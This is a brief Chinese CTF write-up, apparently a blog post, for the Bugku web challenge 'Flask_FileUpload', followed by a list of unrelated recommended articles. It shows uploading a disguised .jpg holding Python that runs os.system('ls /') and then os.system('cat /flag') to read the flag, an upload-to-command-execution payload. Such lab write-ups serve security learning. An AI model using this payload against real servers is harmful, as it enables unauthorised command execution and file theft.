Bugku-web-Flask_FileUpload
查看源代码,提示用python返回结果
在file.jpg中写python代码
import os
os.system('ls / ')上传后查看源代码,找到flag文件夹
修改代码
import os
os.system('cat /flag ')
Bugku-web-Flask_FileUpload
黑白时光les2024-08-01 11:52
相关推荐
colicode3 分钟前
语音提醒接口开发方案:日程安排与待办事项自动电话提醒的集成思路小鸡吃米…21 分钟前
TensorFlow - TensorBoard 可视化爱上妖精的尾巴29 分钟前
8-8 WPS JS宏 正则表达式 字符组与任选OPEN-Source41 分钟前
给 Agent 安装技能:工具抽象、自动选工具与安全边界山岚的运维笔记43 分钟前
SQL Server笔记 -- 第34章:cross apply实时数据1 小时前
渗透测试通过模拟真实黑客的攻击行为,帮助识别系统、网络或应用程序中的潜在漏洞ljxp12345681 小时前
高效删除链表重复节点52Hz1181 小时前
力扣207.课程表、208.实现Trie(前缀树)骇城迷影1 小时前
从零复现GPT-2 124M前端程序猿i1 小时前
第 8 篇:Markdown 渲染引擎 —— 从流式解析到安全输出